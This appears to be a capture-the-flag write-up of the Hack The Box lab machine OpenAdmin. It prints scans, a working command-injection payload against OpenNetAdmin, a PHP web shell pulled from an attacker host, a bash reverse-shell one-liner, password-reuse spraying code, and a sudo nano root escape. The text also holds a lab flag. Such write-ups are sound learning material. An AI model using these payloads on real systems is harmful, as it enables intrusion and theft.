HTB Box OpenAdmin: Penetration Test Notes

Published by misaka19008 on 2024-11-13, 33 reads



Target information

IP address: 10.10.10.171


Information gathering

ICMP check

┌──(root㉿misaka19008)-[/home/…/Documents/pentest_notes/openadmin/nmap_reports]
└─# ping -c 4 10.10.10.171
PING 10.10.10.171 (10.10.10.171) 56(84) bytes of data.
64 bytes from 10.10.10.171: icmp_seq=1 ttl=63 time=82.4 ms
64 bytes from 10.10.10.171: icmp_seq=2 ttl=63 time=157 ms
64 bytes from 10.10.10.171: icmp_seq=3 ttl=63 time=81.6 ms
64 bytes from 10.10.10.171: icmp_seq=4 ttl=63 time=100 ms

--- 10.10.10.171 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3032ms
rtt min/avg/max/mdev = 81.567/105.221/156.793/30.681 ms

Connectivity between the attacking machine and the target is fine. The TTL of 63 on the replies is what a Linux host (default TTL 64) one router hop away looks like.

Firewall detection

# Nmap 7.94SVN scan initiated Tue Aug  6 16:42:07 2024 as: nmap -sF -p- --min-rate 2000 -oN ./fin_result.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.
Not shown: 64064 closed tcp ports (reset), 1471 open|filtered tcp ports (no-response)

# Nmap done at Tue Aug  6 16:45:43 2024 -- 1 IP address (1 host up) scanned in 215.43 seconds

The FIN scan gets RSTs back for almost every port, so closed ports are not being silently dropped by a filter; the 1,471 open|filtered results are mostly probes lost at this scan rate over a 300 ms link (note the retransmission-cap warning), not evidence of a firewall. Nothing conclusive either way, so move straight on to a full-range TCP SYN scan.

Port scanning

TCP port scan results

# Nmap 7.94SVN scan initiated Tue Aug  6 16:51:31 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN ./tcp_result.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/6%OT=22%CT=1%CU=39771%PV=Y%DS=2%DC=T%G=Y%TM=66B1E
OS:474%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=9)S
OS:EQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=100%GCD=2%ISR=106%TI=
OS:Z%CI=Z%II=I%TS=A)SEQ(SP=101%GCD=1%ISR=106%TI=Z%CI=Z%TS=9)OPS(O1=M53CST11
OS:NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53C
OS:ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=
OS:40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2
OS:(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   206.54 ms 10.10.14.1 (10.10.14.1)
2   208.45 ms 10.10.10.171 (10.10.10.171)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  6 16:53:08 2024 -- 1 IP address (1 host up) scanned in 96.54 seconds

UDP port scan results (open port list)

# Nmap 7.94SVN scan initiated Tue Aug  6 16:55:43 2024 as: nmap -sU -p- --min-rate 2000 -oN ./udp_ports.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.32s latency).
All 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.
Not shown: 65180 open|filtered udp ports (no-response), 355 closed udp ports (port-unreach)

# Nmap done at Tue Aug  6 17:01:46 2024 -- 1 IP address (1 host up) scanned in 363.04 seconds

UDP service detection results

(none: no UDP port came back as open)

The SSH and Apache banners carry Ubuntu package versions, so the target runs Ubuntu Linux.


Service enumeration

SSH (port 22)

Banner

┌──(root㉿misaka19008)-[/home/megumin]
└─# nc -nv 10.10.10.171 22                                       
(UNKNOWN) [10.10.10.171] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

Web application (port 80)

Open the home page at http://openadmin.htb/ (map the hostname to 10.10.10.171 in /etc/hosts first). It is the Apache default page nmap already reported, so go straight to directory brute-forcing:

# Dirsearch started Wed Aug  7 08:11:41 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://openadmin.htb/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap

301   314B   http://openadmin.htb/music    -> REDIRECTS TO: http://openadmin.htb/music/
301   312B   http://openadmin.htb/ona    -> REDIRECTS TO: http://openadmin.htb/ona/

Visiting /music shows what looks like a static site:

Visiting /ona shows an OpenNetAdmin v18.1.1 instance deployed under that path:

A quick search turns up a serious unauthenticated command injection (RCE) in this version, tracked as CVE-2019-25065:


Exploitation

Exploiting the OpenNetAdmin RCE

Reading the public exploit shows that the vulnerable page is login.php: the xajax tooltip handler passes the ip argument into a shell command without escaping, so the POST body below runs {COMMAND} on the server:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;{COMMAND};&xajaxargs[]=ping

Open login.php with Burp Suite intercepting the request:

Send the request to Repeater and replace the POST body with the injection payload. The command output is wrapped in <cmdres> markers so it is easy to locate in the response (the percent-encoded bytes simply spell out echo and the quotes); type the commands to run and send:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;id;hostnamectl;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping

The injection works. Next, write a minimal PHP web shell on the attacking machine:

<?php
  // Minimal web shell: run the value of ?cmd= through system() and print its output.
  $command = isset($_GET['cmd']) ? $_GET['cmd'] : '';
  if ($command !== '') {
    system($command);
  } else {
    die("Hello, hello, I'm sparkle!");
  }
?>

Then use the injection to fetch it onto the target (serve sparkle.php from the attacking machine first, for example with python3 -m http.server 80). wget saves the file into the working directory of the executing script, which is the /ona web root, so the shell becomes reachable as /ona/sparkle.php:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;wget%20http://10.10.14.14/sparkle.php;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping

Success. Start a listener on the attacking machine (nc -lvnp 443), then request the web shell with a reverse-shell one-liner as the cmd parameter. The command contains spaces and several & characters, so it must be URL-encoded (& as %26) or the query string gets split at the first &:

/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'


Privilege escalation

Pivoting to jimmy

After landing on the box, initial enumeration shows two local users: jimmy and joanna.

OpenNetAdmin's database configuration lives at /opt/ona/www/local/config/database_settings.inc.php. Reading it:

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

Database credentials recovered:

  • Username: ona_sys
  • Password: n1nj4W4rri0R!
  • Host: localhost

Logging into MySQL with these turns up nothing useful, so try the database password as jimmy's password (su jimmy):

It works: the database password is reused for the jimmy account.
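The config file above is the kind of thing worth parsing mechanically rather than by eye, and the reuse check that follows is just "every local user times every recovered password". The block below is an added example, not the write-up's own code: the sample config reproduces the structure of the file shown above (the password value is the one from the page), and the function names are this example's own.

```python
"""Pull db_* credential blocks out of an OpenNetAdmin database_settings.inc.php
and list the (user, password) pairs worth trying for reuse (added example)."""
import re
from typing import Dict, Iterable, List, Tuple

# Sample config: same structure as the file read above; constructed for this example.
SAMPLE_CONFIG = """<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
  ),
);
?>
"""

# 'db_key' => 'quoted value'   or   'db_key' => bare literal (true/false/number)
_KV = re.compile(r"'(db_\w+)'\s*=>\s*(?:'((?:[^'\\]|\\.)*)'|([A-Za-z0-9_]+))")


def parse_db_settings(php_source: str) -> List[Dict[str, str]]:
    """Return one dict per database block; each 'db_type' key starts a new block."""
    blocks: List[Dict[str, str]] = []
    for m in _KV.finditer(php_source):
        key = m.group(1)
        value = m.group(2) if m.group(2) is not None else m.group(3)
        if key == "db_type" or not blocks:
            blocks.append({})
        blocks[-1][key] = value.replace("\\'", "'")  # undo PHP single-quote escaping
    return blocks


def reuse_candidates(blocks: List[Dict[str, str]],
                     system_users: Iterable[str]) -> List[Tuple[str, str]]:
    """(username, password) pairs to try with su/ssh: the DB login itself, then
    every local user with every recovered DB password. Order is kept and
    duplicates are dropped so the list can be fed straight to a spray loop."""
    seen = set()
    pairs: List[Tuple[str, str]] = []
    for block in blocks:
        password = block.get("db_passwd")
        if not password:
            continue
        for user in [block.get("db_login")] + list(system_users):
            if user and (user, password) not in seen:
                seen.add((user, password))
                pairs.append((user, password))
    return pairs


if __name__ == "__main__":
    found = parse_db_settings(SAMPLE_CONFIG)
    for user, password in reuse_candidates(found, ["jimmy", "joanna"]):
        print(f"try {user}:{password}")
```

On a real engagement the same loop feeds `su`, SSH or the MySQL client; here it would have produced the jimmy hit directly.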

In addition, there is an internal directory under /var/www that jimmy is allowed to read.

Local enumeration

Basic system information

Process list

Scheduled tasks

Environment variables

User information

Home directories

SUID/SGID files

Open ports

Permissions on sensitive files

Going through the results, port 52846 is listening on 127.0.0.1 only, so it is reachable just from the box itself. That makes it the next pivot.

Attacking port 52846

First, on the attacking machine, tunnel that port over SSH (jimmy's reused password authenticates the session):

ssh -NfqL 52846:localhost:52846 jimmy@10.10.10.171
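Finding loopback-only listeners and turning them into -L forwards is the same routine on every box, so here it is as an added example (not the write-up's own code). The ss output below is constructed to mirror what local enumeration on this box shows (52846 and MySQL bound to 127.0.0.1, SSH and HTTP on all interfaces); it is not a verbatim capture, and the function names are assumptions.

```python
"""Find services bound only to loopback in `ss -lntp` output and compose the
SSH local-forward command used above (added example; sample is constructed)."""
import ipaddress
from typing import Dict, List, NamedTuple


class Listener(NamedTuple):
    addr: str      # local address as printed by ss ('*' or '[::]' for wildcard)
    port: int
    process: str   # users:(...) column, empty when ss could not read it


SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     127.0.0.1:52846      0.0.0.0:*          users:(("apache2",pid=1234,fd=4))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=900,fd=20))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=800,fd=3))
LISTEN  0       128     *:80                 *:*                users:(("apache2",pid=1234,fd=6))
LISTEN  0       128     [::]:22              [::]:*
"""


def parse_ss_listeners(text: str) -> List[Listener]:
    """Parse the LISTEN rows of `ss -lntp` (or `ss -lnt`) output."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)   # rsplit keeps IPv6 '[::]' intact
        process = " ".join(fields[5:])          # absent without -p or as a non-root user
        listeners.append(Listener(addr, int(port), process))
    return listeners


def is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; wildcard ('*', 0.0.0.0, [::]) is not loopback."""
    addr = addr.strip("[]")
    if addr == "*":
        return False
    return ipaddress.ip_address(addr).is_loopback


def loopback_only_ports(listeners: List[Listener]) -> List[int]:
    """Ports bound exclusively to loopback, i.e. reachable only from the host.

    A port that also appears on a wildcard or routable address is excluded,
    so the result is the set of forwarding candidates, not every loopback socket.
    """
    bound: Dict[int, List[bool]] = {}
    for l in listeners:
        bound.setdefault(l.port, []).append(is_loopback(l.addr))
    return sorted(port for port, flags in bound.items() if all(flags))


def ssh_forward_command(ports: List[int], user: str, host: str) -> str:
    """`ssh -Nfq` with one -L per port, mapping the same port on the attacker."""
    forwards = " ".join(f"-L {p}:localhost:{p}" for p in ports)
    return f"ssh -Nfq {forwards} {user}@{host}"


if __name__ == "__main__":
    found = parse_ss_listeners(SAMPLE_SS_OUTPUT)
    hidden = loopback_only_ports(found)
    for l in found:
        tag = "loopback-only" if l.port in hidden else "exposed"
        print(f"{l.addr}:{l.port:<6} {tag:14} {l.process}")
    print(ssh_forward_command(hidden, "jimmy", "10.10.10.171"))
```

Forwarding 3306 as well lets the attacker's own mysql client talk to the database with the ona_sys credentials, which is more comfortable than working through a reverse shell.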

Then scan the forwarded port on the attacker's own loopback (the OS-detection part of -A is meaningless here, since the host being fingerprinted is the attacking machine itself):

# Nmap 7.94SVN scan initiated Wed Aug  7 11:02:13 2024 as: nmap -sS -sV -A -p 52846 -oN ./52846_result.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000066s latency).

PORT      STATE SERVICE VERSION
52846/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Tutorialspoint.com
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.7 (96%), Linux 3.8 - 4.14 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.7 - 3.11 (94%), Linux 2.6.32 (93%), Linux 3.7 - 3.10 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  7 11:02:36 2024 -- 1 IP address (1 host up) scanned in 23.41 seconds

The port serves HTTP; open http://127.0.0.1:52846/ through the tunnel.

Comparing with /var/www/internal/index.php, the HTML in that file matches the page exactly:

So the document root of this vhost is /var/www/internal. Copy sparkle.php into it as jimmy and ask the shell which user it runs as:

The service runs as joanna. Reverse shell through it, same as before:

Success.

Switching to an SSH login

As joanna, sudo does not work from the reverse shell (no controlling TTY), so append the attacking machine's SSH public key to ~joanna/.ssh/authorized_keys and log in over SSH instead:

Privilege escalation via sudo nano

Logged in as joanna, sudo -l shows she can run /bin/nano on /opt/priv as root without a password:

Escalate with the well-known nano escape: Ctrl+R opens the "read file" prompt, Ctrl+X from there switches it to "Command to execute", and the command below re-attaches a shell to the terminal:

sudo /bin/nano /opt/priv
[Ctrl + R][Ctrl + X]
reset; sh 1>&0 2>&0

Root shell obtained.


Flags

18e7e4fec22edf7d01e121da577b6ef8

That wraps up this box.


Last updated 2024-11-13